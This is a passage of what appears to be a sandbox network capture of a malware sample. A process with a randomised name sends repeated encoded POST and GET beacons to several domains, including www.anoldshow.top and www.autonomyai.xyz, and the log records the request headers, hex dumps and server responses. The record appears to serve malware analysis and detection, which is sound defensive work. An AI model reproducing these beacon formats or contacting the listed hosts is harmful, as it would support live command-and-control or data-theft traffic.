                                  Content-Length: 233
                                  Cache-Control: max-age=0
                                  Connection: close
                                  Content-Type: application/x-www-form-urlencoded
                                  Origin: http://www.anoldshow.top
                                  Referer: http://www.anoldshow.top/ii3e/
                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko
                                  Data Raw: 46 4e 50 64 3d 74 57 33 2f 6c 57 45 31 37 68 50 59 30 6e 48 54 63 69 55 30 2f 4f 4d 32 6e 57 34 7a 6c 51 57 44 39 66 6b 4b 71 6b 7a 63 38 4a 74 54 68 66 68 70 37 33 41 68 59 2b 62 6c 6d 75 4d 54 48 55 62 63 44 5a 68 37 2f 47 34 43 4d 68 31 78 4c 74 75 7a 30 2b 54 48 4e 74 61 74 59 38 72 75 2f 44 72 36 77 4c 6a 4d 74 49 6d 55 6e 33 53 73 71 6c 55 36 32 48 72 4f 59 30 35 32 2f 43 41 63 4c 43 4e 43 46 69 4f 35 71 65 2f 4e 30 34 63 52 39 75 47 68 49 71 6f 75 45 6e 37 68 76 2f 48 32 78 55 6f 5a 4d 4e 57 5a 7a 66 44 53 4e 48 57 7a 4d 54 74 2b 4a 4d 2b 64 62 6e 75 64 43 30 74 65 70 39 64 57 54 36 38 6c 38 42 53 46 47 2b 76 50 35 71 43 68 61 79 72 53 49 42 30 46 6a 2f 65 51 31 5a 48 69 54 77 3d 3d
                                  Data Ascii: FNPd=tW3/lWE17hPY0nHTciU0/OM2nW4zlQWD9fkKqkzc8JtThfhp73AhY+blmuMTHUbcDZh7/G4CMh1xLtuz0+THNtatY8ru/Dr6wLjMtImUn3SsqlU62HrOY052/CAcLCNCFiO5qe/N04cR9uGhIqouEn7hv/H2xUoZMNWZzfDSNHWzMTt+JM+dbnudC0tep9dWT68l8BSFG+vP5qChayrSIB0Fj/eQ1ZHiTw==
                                  May 23, 2024 15:20:03.079688072 CEST | 658               | IN        | HTTP/1.1 404 Not Found
                                  Date: Thu, 23 May 2024 13:20:02 GMT
                                  Server: Apache
                                  Content-Length: 514
                                  Connection: close
                                  Content-Type: text/html
                                  Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 3e 0a 3c 68 65 61 64 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 63 64 6e 6a 73 2e 63 6c 6f 75 64 66 6c 61 72 65 2e 63 6f 6d 2f 61 6a 61 78 2f 6c 69 62 73 2f 6e 6f 72 6d 61 6c 69 7a 65 2f 35 2e 30 2e 30 2f 6e 6f 72 6d 61 6c 69 7a 65 2e 6d 69 6e 2e 63 73 73 22 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 2e 2f 73 74 79 6c 65 2e 63 73 73 22 3e 0a 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 21 2d 2d 20 70 61 72 74 69 61 6c 3a 69 6e 64 65 78 2e 70 61 72 74 69 61 6c 2e 68 74 6d 6c 20 2d 2d 3e 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 73 69 74 65 22 3e 0a 09 3c 64 69 76 20 63 6c 61 73 73 3d 22 73 6b 65 74 63 68 22 3e [TRUNCATED]
                                  Data Ascii: <!DOCTYPE html><html lang="en" ><head> <meta charset="UTF-8"> <title>404 Not Found</title> <link rel="stylesheet" href="https://cdnjs.cloudflare.com/ajax/libs/normalize/5.0.0/normalize.min.css"><link rel="stylesheet" href="./style.css"></head><body><!-- partial:index.partial.html --><div class="site"><div class="sketch"><div class="bee-sketch red"></div><div class="bee-sketch blue"></div></div><h1>404:<small>Players Not Found</small></h1></div><!-- partial --> </body></html>


                                  Session ID | Source IP   | Source Port | Destination IP | Destination Port | PID  | Process
                                  19         | 192.168.2.6 | 49725       | 203.161.43.228 | 80               | 3152 | C:\Program Files (x86)\ZKTVCxXmVpOAlSpRMrHiuryimmIlixFCBUvSvMDsZzTtUVBghPJFdqjgUthrOf\YoOsbbockoYKKBpRowW.exe
                                  Timestamp                            | Bytes transferred | Direction | Data
                                  May 23, 2024 15:20:05.948220015 CEST | 1782              | OUT       | POST /ii3e/ HTTP/1.1
                                  Host: www.anoldshow.top
                                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                  Accept-Language: en-US,en;q=0.9
                                  Accept-Encoding: gzip, deflate, br
                                  Content-Length: 1245
                                  Cache-Control: max-age=0
                                  Connection: close
                                  Content-Type: application/x-www-form-urlencoded
                                  Origin: http://www.anoldshow.top
                                  Referer: http://www.anoldshow.top/ii3e/
                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko
                                  Data Raw: 46 4e 50 64 3d 74 57 33 2f 6c 57 45 31 37 68 50 59 30 6e 48 54 63 69 55 30 2f 4f 4d 32 6e 57 34 7a 6c 51 57 44 39 66 6b 4b 71 6b 7a 63 38 49 35 54 68 71 31 70 34 51 30 68 5a 2b 62 6c 76 4f 4d 53 48 55 62 64 44 5a 5a 42 2f 47 39 33 4d 6b 70 78 45 75 6d 7a 6a 2f 54 48 48 74 61 74 61 38 72 76 37 44 71 79 77 50 48 49 74 49 32 55 6e 33 53 73 71 6d 38 36 68 44 2f 4f 55 55 35 31 31 69 41 51 64 79 4d 66 46 69 57 70 71 65 37 64 31 49 38 52 7a 75 57 68 62 34 41 75 47 48 37 6e 73 2f 47 78 78 55 73 47 4d 4e 4b 6a 7a 65 6e 34 4e 45 4b 7a 64 56 38 2b 56 6f 6d 6e 44 42 79 71 63 58 5a 38 6b 62 68 79 63 62 56 62 31 41 69 7a 47 4d 72 7a 39 64 36 45 63 44 47 2f 4f 7a 55 32 68 4a 72 54 67 4a 61 63 43 44 42 66 7a 6f 30 58 74 74 79 39 66 75 70 71 64 68 6c 42 51 57 48 50 55 6e 74 32 61 4e 4a 55 70 6d 79 65 6c 74 2b 6f 6e 57 78 69 42 54 53 4c 6b 52 2b 6b 6f 78 2f 67 6d 4a 70 47 31 42 39 61 37 61 59 51 5a 41 56 65 50 4a 2b 4e 4a 56 50 6a 7a 36 6b 64 4a 6c 72 76 48 67 62 44 4c 6d 75 57 62 53 76 46 69 33 4b 65 46 74 57 58 46 [TRUNCATED]
                                  Data Ascii: FNPd=[TRUNCATED]
                                  May 23, 2024 15:20:06.566871881 CEST | 658               | IN        | HTTP/1.1 404 Not Found
                                  Date: Thu, 23 May 2024 13:20:06 GMT
                                  Server: Apache
                                  Content-Length: 514
                                  Connection: close
                                  Content-Type: text/html
                                  Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 3e 0a 3c 68 65 61 64 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 63 64 6e 6a 73 2e 63 6c 6f 75 64 66 6c 61 72 65 2e 63 6f 6d 2f 61 6a 61 78 2f 6c 69 62 73 2f 6e 6f 72 6d 61 6c 69 7a 65 2f 35 2e 30 2e 30 2f 6e 6f 72 6d 61 6c 69 7a 65 2e 6d 69 6e 2e 63 73 73 22 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 2e 2f 73 74 79 6c 65 2e 63 73 73 22 3e 0a 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 21 2d 2d 20 70 61 72 74 69 61 6c 3a 69 6e 64 65 78 2e 70 61 72 74 69 61 6c 2e 68 74 6d 6c 20 2d 2d 3e 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 73 69 74 65 22 3e 0a 09 3c 64 69 76 20 63 6c 61 73 73 3d 22 73 6b 65 74 63 68 22 3e [TRUNCATED]
                                  Data Ascii: <!DOCTYPE html><html lang="en" ><head> <meta charset="UTF-8"> <title>404 Not Found</title> <link rel="stylesheet" href="https://cdnjs.cloudflare.com/ajax/libs/normalize/5.0.0/normalize.min.css"><link rel="stylesheet" href="./style.css"></head><body><!-- partial:index.partial.html --><div class="site"><div class="sketch"><div class="bee-sketch red"></div><div class="bee-sketch blue"></div></div><h1>404:<small>Players Not Found</small></h1></div><!-- partial --></body></html>


                                  Session ID: 20 | Source: 192.168.2.6:49726 | Destination: 203.161.43.228:80 | PID: 3152 | Process: C:\Program Files (x86)\ZKTVCxXmVpOAlSpRMrHiuryimmIlixFCBUvSvMDsZzTtUVBghPJFdqjgUthrOf\YoOsbbockoYKKBpRowW.exe
                                  Timestamp: May 23, 2024 15:20:08.950460911 CEST | Bytes transferred: 492 | Direction: OUT
                                  GET /ii3e/?FNPd=gUffmmgf+j+eonfXGycQzt8ao2VHtB63wMQRmDLG69g3nf5Br3Vvevf8g6YjJ3DFTJ0p8mRaN1UTMPOwjNToF+SwMNbt6WzMyov1r5SS6GyZoHVOyxmtZVBap1MoFQhjNwOQqL8=&zdK0d=M8mTZ0xHNd1dPVm HTTP/1.1
                                  Host: www.anoldshow.top
                                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                  Accept-Language: en-US,en;q=0.9
                                  Connection: close
                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko
                                  Timestamp: May 23, 2024 15:20:09.560302973 CEST | Bytes transferred: 673 | Direction: IN
                                  HTTP/1.1 404 Not Found
                                  Date: Thu, 23 May 2024 13:20:09 GMT
                                  Server: Apache
                                  Content-Length: 514
                                  Connection: close
                                  Content-Type: text/html; charset=utf-8
                                  Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 3e 0a 3c 68 65 61 64 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 63 64 6e 6a 73 2e 63 6c 6f 75 64 66 6c 61 72 65 2e 63 6f 6d 2f 61 6a 61 78 2f 6c 69 62 73 2f 6e 6f 72 6d 61 6c 69 7a 65 2f 35 2e 30 2e 30 2f 6e 6f 72 6d 61 6c 69 7a 65 2e 6d 69 6e 2e 63 73 73 22 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 2e 2f 73 74 79 6c 65 2e 63 73 73 22 3e 0a 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 21 2d 2d 20 70 61 72 74 69 61 6c 3a 69 6e 64 65 78 2e 70 61 72 74 69 61 6c 2e 68 74 6d 6c 20 2d 2d 3e 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 73 69 74 65 22 3e 0a 09 3c 64 69 76 20 63 6c 61 73 73 3d 22 73 6b 65 74 63 68 22 3e [TRUNCATED]
                                  Data Ascii: <!DOCTYPE html><html lang="en" ><head> <meta charset="UTF-8"> <title>404 Not Found</title> <link rel="stylesheet" href="https://cdnjs.cloudflare.com/ajax/libs/normalize/5.0.0/normalize.min.css"><link rel="stylesheet" href="./style.css"></head><body><!-- partial:index.partial.html --><div class="site"><div class="sketch"><div class="bee-sketch red"></div><div class="bee-sketch blue"></div></div><h1>404:<small>Players Not Found</small></h1></div><!-- partial --></body></html>


                                  Session ID: 21 | Source: 192.168.2.6:49727 | Destination: 3.33.130.190:80 | PID: 3152 | Process: C:\Program Files (x86)\ZKTVCxXmVpOAlSpRMrHiuryimmIlixFCBUvSvMDsZzTtUVBghPJFdqjgUthrOf\YoOsbbockoYKKBpRowW.exe
                                  Timestamp: May 23, 2024 15:20:14.696083069 CEST | Bytes transferred: 772 | Direction: OUT
                                  POST /vucc/ HTTP/1.1
                                  Host: www.badcopsinyourtown.info
                                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                  Accept-Language: en-US,en;q=0.9
                                  Accept-Encoding: gzip, deflate, br
                                  Content-Length: 209
                                  Cache-Control: max-age=0
                                  Connection: close
                                  Content-Type: application/x-www-form-urlencoded
                                  Origin: http://www.badcopsinyourtown.info
                                  Referer: http://www.badcopsinyourtown.info/vucc/
                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko
                                  Data Raw: 46 4e 50 64 3d 68 72 68 73 42 56 31 69 79 38 4a 74 31 4b 73 43 33 53 31 76 45 62 46 72 6c 74 52 6e 76 30 6d 77 38 5a 72 41 34 38 72 41 2b 5a 78 45 70 6f 55 72 74 32 31 71 78 48 67 71 67 75 7a 32 49 39 74 64 62 74 5a 50 73 6b 4c 72 61 51 4d 35 57 64 6b 2b 35 56 77 51 66 51 35 41 6b 34 6e 41 68 42 42 6f 30 36 52 36 7a 43 73 71 44 7a 77 47 46 64 43 67 43 51 6b 4b 57 78 32 77 4b 77 52 4f 76 39 5a 69 52 32 6f 49 5a 73 4c 78 79 62 39 4f 74 6e 57 70 73 72 5a 36 35 67 44 39 68 66 35 63 33 78 55 4a 58 45 45 48 35 5a 54 56 53 65 53 76 64 37 35 32 4d 4a 58 4c 43 57 75 71 72 55 4a 2b 70 77 63 51 64 31 73 2b 71 74 59 44 70 42 55 4f
                                  Data Ascii: FNPd=hrhsBV1iy8Jt1KsC3S1vEbFrltRnv0mw8ZrA48rA+ZxEpoUrt21qxHgqguz2I9tdbtZPskLraQM5Wdk+5VwQfQ5Ak4nAhBBo06R6zCsqDzwGFdCgCQkKWx2wKwROv9ZiR2oIZsLxyb9OtnWpsrZ65gD9hf5c3xUJXEEH5ZTVSeSvd752MJXLCWuqrUJ+pwcQd1s+qtYDpBUO


                                  Session ID: 22 | Source: 192.168.2.6:49728 | Destination: 3.33.130.190:80 | PID: 3152 | Process: C:\Program Files (x86)\ZKTVCxXmVpOAlSpRMrHiuryimmIlixFCBUvSvMDsZzTtUVBghPJFdqjgUthrOf\YoOsbbockoYKKBpRowW.exe
                                  Timestamp: May 23, 2024 15:20:17.233599901 CEST | Bytes transferred: 796 | Direction: OUT
                                  POST /vucc/ HTTP/1.1
                                  Host: www.badcopsinyourtown.info
                                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                  Accept-Language: en-US,en;q=0.9
                                  Accept-Encoding: gzip, deflate, br
                                  Content-Length: 233
                                  Cache-Control: max-age=0
                                  Connection: close
                                  Content-Type: application/x-www-form-urlencoded
                                  Origin: http://www.badcopsinyourtown.info
                                  Referer: http://www.badcopsinyourtown.info/vucc/
                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko
                                  Data Raw: 46 4e 50 64 3d 68 72 68 73 42 56 31 69 79 38 4a 74 30 72 63 43 6b 46 4a 76 43 37 46 71 71 4e 52 6e 32 6b 6d 30 38 5a 33 41 34 35 4b 46 2b 74 64 45 71 4d 63 72 2f 6b 64 71 77 48 67 71 30 2b 79 79 4d 39 74 67 62 74 45 77 73 6b 48 72 61 52 6f 35 57 59 59 2b 35 69 74 47 66 41 35 43 77 49 6e 43 6c 42 42 6f 30 36 52 36 7a 43 70 42 44 31 59 47 46 4e 79 67 46 42 6b 4a 62 52 32 7a 64 41 52 4f 39 4e 5a 6d 52 32 6f 6d 5a 74 48 50 79 5a 46 4f 74 6e 47 70 74 36 5a 39 33 67 44 42 75 2f 34 70 37 41 68 48 53 46 42 49 78 5a 50 58 52 4a 71 48 59 4e 34 73 51 36 58 6f 51 47 4f 6f 72 57 52 4d 70 51 63 36 66 31 55 2b 34 36 55 6b 6d 31 78 74 48 74 2f 31 71 59 45 41 62 43 30 52 63 30 33 4b 54 44 77 62 32 67 3d 3d
                                  Data Ascii: FNPd=hrhsBV1iy8Jt0rcCkFJvC7FqqNRn2km08Z3A45KF+tdEqMcr/kdqwHgq0+yyM9tgbtEwskHraRo5WYY+5itGfA5CwInClBBo06R6zCpBD1YGFNygFBkJbR2zdARO9NZmR2omZtHPyZFOtnGpt6Z93gDBu/4p7AhHSFBIxZPXRJqHYN4sQ6XoQGOorWRMpQc6f1U+46Ukm1xtHt/1qYEAbC0Rc03KTDwb2g==


                                  Session ID: 23 | Source: 192.168.2.6:49729 | Destination: 3.33.130.190:80 | PID: 3152 | Process: C:\Program Files (x86)\ZKTVCxXmVpOAlSpRMrHiuryimmIlixFCBUvSvMDsZzTtUVBghPJFdqjgUthrOf\YoOsbbockoYKKBpRowW.exe
                                  Timestamp: May 23, 2024 15:20:19.774887085 CEST | Bytes transferred: 1809 | Direction: OUT
                                  POST /vucc/ HTTP/1.1
                                  Host: www.badcopsinyourtown.info
                                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                  Accept-Language: en-US,en;q=0.9
                                  Accept-Encoding: gzip, deflate, br
                                  Content-Length: 1245
                                  Cache-Control: max-age=0
                                  Connection: close
                                  Content-Type: application/x-www-form-urlencoded
                                  Origin: http://www.badcopsinyourtown.info
                                  Referer: http://www.badcopsinyourtown.info/vucc/
                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko
                                  Data Raw: 46 4e 50 64 3d 68 72 68 73 42 56 31 69 79 38 4a 74 30 72 63 43 6b 46 4a 76 43 37 46 71 71 4e 52 6e 32 6b 6d 30 38 5a 33 41 34 35 4b 46 2b 74 56 45 71 2b 45 72 74 54 42 71 7a 48 67 71 33 2b 79 78 4d 39 74 48 62 74 4d 30 73 6b 37 64 61 54 67 35 55 39 55 2b 6f 6d 5a 47 52 41 35 43 79 49 6e 44 68 42 42 35 30 36 42 2b 7a 42 42 42 44 31 59 47 46 4f 71 67 54 41 6b 4a 49 68 32 77 4b 77 51 50 76 39 5a 65 52 32 67 51 5a 74 44 66 78 71 4e 4f 73 44 61 70 75 49 42 39 2f 67 44 44 70 2f 34 78 37 41 39 4d 53 46 4e 69 78 61 53 79 52 4f 61 48 62 4a 42 61 4e 34 53 7a 45 48 53 4e 38 52 52 7a 79 47 73 6d 47 57 6b 6a 37 59 6b 73 6b 31 35 47 65 74 7a 31 2f 65 42 42 54 77 59 69 64 30 43 75 56 68 77 65 6b 64 46 4d 50 4d 31 32 72 58 4d 6f 2f 4b 63 45 75 72 57 6f 68 69 4a 71 48 72 31 33 45 34 51 6a 35 41 5a 32 63 59 50 76 70 57 32 6d 42 55 6d 69 58 42 39 63 50 4b 51 33 4a 48 71 33 6e 2b 4b 6c 6f 59 43 43 71 69 79 62 30 61 49 4f 72 69 45 74 70 36 4e 6d 68 64 4b 53 64 71 51 58 41 75 64 6d 54 47 4f 4b 70 6f 63 64 4e 43 78 50 55 [TRUNCATED]
                                  Data Ascii: FNPd=... [TRUNCATED]


                                  Session ID: 24 | Source: 192.168.2.6:49730 | Destination: 3.33.130.190:80 | PID: 3152 | Process: C:\Program Files (x86)\ZKTVCxXmVpOAlSpRMrHiuryimmIlixFCBUvSvMDsZzTtUVBghPJFdqjgUthrOf\YoOsbbockoYKKBpRowW.exe
                                  Timestamp: May 23, 2024 15:20:23.881931067 CEST | Bytes transferred: 501 | Direction: OUT
                                  GET /vucc/?FNPd=spJMClAwzf8Vr4tU/CNFMIwartImjnuX45nH0e+a/t8mnJgptjgbw3tj3ejIJ/FML5FH3w7kVV5/X9kg+3gEfjxhkZ7ZkTpqlYFj4xEsGEUQd8yZWQ8UdxmAeS1YmrNTPUkJX5Q=&zdK0d=M8mTZ0xHNd1dPVm HTTP/1.1
                                  Host: www.badcopsinyourtown.info
                                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                  Accept-Language: en-US,en;q=0.9
                                  Connection: close
                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko
                                  Timestamp: May 23, 2024 15:20:24.347069025 CEST | Bytes transferred: 418 | Direction: IN
                                  HTTP/1.1 200 OK
                                  Server: openresty
                                  Date: Thu, 23 May 2024 13:20:24 GMT
                                  Content-Type: text/html
                                  Content-Length: 278
                                  Connection: close
                                  Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 73 63 72 69 70 74 3e 77 69 6e 64 6f 77 2e 6f 6e 6c 6f 61 64 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 77 69 6e 64 6f 77 2e 6c 6f 63 61 74 69 6f 6e 2e 68 72 65 66 3d 22 2f 6c 61 6e 64 65 72 3f 46 4e 50 64 3d 73 70 4a 4d 43 6c 41 77 7a 66 38 56 72 34 74 55 2f 43 4e 46 4d 49 77 61 72 74 49 6d 6a 6e 75 58 34 35 6e 48 30 65 2b 61 2f 74 38 6d 6e 4a 67 70 74 6a 67 62 77 33 74 6a 33 65 6a 49 4a 2f 46 4d 4c 35 46 48 33 77 37 6b 56 56 35 2f 58 39 6b 67 2b 33 67 45 66 6a 78 68 6b 5a 37 5a 6b 54 70 71 6c 59 46 6a 34 78 45 73 47 45 55 51 64 38 79 5a 57 51 38 55 64 78 6d 41 65 53 31 59 6d 72 4e 54 50 55 6b 4a 58 35 51 3d 26 7a 64 4b 30 64 3d 4d 38 6d 54 5a 30 78 48 4e 64 31 64 50 56 6d 22 7d 3c 2f 73 63 72 69 70 74 3e 3c 2f 68 65 61 64 3e 3c 2f 68 74 6d 6c 3e
                                  Data Ascii: <!DOCTYPE html><html><head><script>window.onload=function(){window.location.href="/lander?FNPd=spJMClAwzf8Vr4tU/CNFMIwartImjnuX45nH0e+a/t8mnJgptjgbw3tj3ejIJ/FML5FH3w7kVV5/X9kg+3gEfjxhkZ7ZkTpqlYFj4xEsGEUQd8yZWQ8UdxmAeS1YmrNTPUkJX5Q=&zdK0d=M8mTZ0xHNd1dPVm"}</script></head></html>


                                  Session ID: 25 | Source: 192.168.2.6:49731 | Destination: 3.33.130.190:80 | PID: 3152 | Process: C:\Program Files (x86)\ZKTVCxXmVpOAlSpRMrHiuryimmIlixFCBUvSvMDsZzTtUVBghPJFdqjgUthrOf\YoOsbbockoYKKBpRowW.exe
                                  Timestamp: May 23, 2024 15:20:29.405294895 CEST | Bytes transferred: 748 | Direction: OUT
                                  POST /nvvv/ HTTP/1.1
                                  Host: www.autonomyai.xyz
                                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                  Accept-Language: en-US,en;q=0.9
                                  Accept-Encoding: gzip, deflate, br
                                  Content-Length: 209
                                  Cache-Control: max-age=0
                                  Connection: close
                                  Content-Type: application/x-www-form-urlencoded
                                  Origin: http://www.autonomyai.xyz
                                  Referer: http://www.autonomyai.xyz/nvvv/
                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko
                                  Data Raw: 46 4e 50 64 3d 45 42 41 39 67 51 71 58 75 47 4d 64 54 76 4b 5a 2b 4f 41 64 38 5a 52 48 68 79 2f 35 52 2f 65 6b 51 33 72 76 68 77 62 52 6b 75 55 37 53 48 57 52 46 6c 2b 79 4a 78 50 43 4b 55 4a 51 62 5a 79 4f 7a 6b 56 62 57 31 33 65 58 71 75 31 6d 46 38 68 35 67 67 4a 49 63 5a 30 66 74 2b 67 44 48 73 37 4d 43 65 64 77 34 55 64 71 58 5a 50 67 48 6d 35 78 32 2b 37 38 42 6c 71 30 73 70 6e 70 65 68 77 65 50 59 57 33 35 59 39 6a 65 64 44 4f 37 66 46 48 57 2f 32 4f 34 6d 69 36 4d 54 4f 4a 44 5a 6c 4d 2f 79 32 69 72 68 35 78 2b 38 35 4d 56 70 6e 37 67 64 4a 67 6d 38 48 33 56 30 2f 66 32 50 70 70 6f 63 58 61 37 6d 39 36 42 56 30
                                  Data Ascii: FNPd=EBA9gQqXuGMdTvKZ+OAd8ZRHhy/5R/ekQ3rvhwbRkuU7SHWRFl+yJxPCKUJQbZyOzkVbW13eXqu1mF8h5ggJIcZ0ft+gDHs7MCedw4UdqXZPgHm5x2+78Blq0spnpehwePYW35Y9jedDO7fFHW/2O4mi6MTOJDZlM/y2irh5x+85MVpn7gdJgm8H3V0/f2PppocXa7m96BV0


                                  Session ID: 26 | Source: 192.168.2.6:49732 | Destination: 3.33.130.190:80 | PID: 3152 | Process: C:\Program Files (x86)\ZKTVCxXmVpOAlSpRMrHiuryimmIlixFCBUvSvMDsZzTtUVBghPJFdqjgUthrOf\YoOsbbockoYKKBpRowW.exe
                                  Timestamp: May 23, 2024 15:20:31.945274115 CEST | Bytes transferred: 772 | Direction: OUT
                                  POST /nvvv/ HTTP/1.1
                                  Host: www.autonomyai.xyz
                                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                  Accept-Language: en-US,en;q=0.9
                                  Accept-Encoding: gzip, deflate, br
                                  Content-Length: 233
                                  Cache-Control: max-age=0
                                  Connection: close
                                  Content-Type: application/x-www-form-urlencoded
                                  Origin: http://www.autonomyai.xyz
                                  Referer: http://www.autonomyai.xyz/nvvv/
                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko
                                  Data Raw: 46 4e 50 64 3d 45 42 41 39 67 51 71 58 75 47 4d 64 53 4b 43 5a 34 74 6f 64 37 35 52 45 6b 79 2f 35 4b 76 65 6f 51 33 76 76 68 78 76 42 6e 63 77 37 54 69 79 52 45 67 53 79 4b 78 50 43 46 30 4a 52 45 4a 79 2f 7a 6b 59 75 57 30 62 65 58 71 36 31 6d 41 51 68 35 54 49 4b 4a 4d 5a 4d 5a 74 2b 69 4d 6e 73 37 4d 43 65 64 77 34 42 56 71 58 68 50 6a 7a 69 35 79 54 4b 34 69 52 6c 74 7a 73 70 6e 74 65 67 35 65 50 5a 44 33 34 55 58 6a 64 6c 44 4f 35 58 46 48 6a 54 31 56 6f 6d 6b 2b 4d 53 46 45 42 38 4f 47 4f 72 43 69 49 42 63 68 5a 6c 44 4a 6a 6f 39 6e 54 64 71 79 32 63 46 33 58 73 4e 66 57 50 44 72 6f 6b 58 49 73 71 61 31 31 77 58 2f 78 74 4e 54 73 36 36 63 4a 48 48 78 71 6a 2b 69 4e 6d 31 4f 41 3d 3d
                                  Data Ascii: FNPd=EBA9gQqXuGMdSKCZ4tod75REky/5KveoQ3vvhxvBncw7TiyREgSyKxPCF0JREJy/zkYuW0beXq61mAQh5TIKJMZMZt+iMns7MCedw4BVqXhPjzi5yTK4iRltzspnteg5ePZD34UXjdlDO5XFHjT1Vomk+MSFEB8OGOrCiIBchZlDJjo9nTdqy2cF3XsNfWPDrokXIsqa11wX/xtNTs66cJHHxqj+iNm1OA==


                                  Session ID: 27 | Source: 192.168.2.6:49733 | Destination: 3.33.130.190:80 | PID: 3152 | Process: C:\Program Files (x86)\ZKTVCxXmVpOAlSpRMrHiuryimmIlixFCBUvSvMDsZzTtUVBghPJFdqjgUthrOf\YoOsbbockoYKKBpRowW.exe
                                  Timestamp: May 23, 2024 15:20:34.479114056 CEST | Bytes transferred: 1785 | Direction: OUT
                                  POST /nvvv/ HTTP/1.1
                                  Host: www.autonomyai.xyz
                                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                  Accept-Language: en-US,en;q=0.9
                                  Accept-Encoding: gzip, deflate, br
                                  Content-Length: 1245
                                  Cache-Control: max-age=0
                                  Connection: close
                                  Content-Type: application/x-www-form-urlencoded
                                  Origin: http://www.autonomyai.xyz
                                  Referer: http://www.autonomyai.xyz/nvvv/
                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko
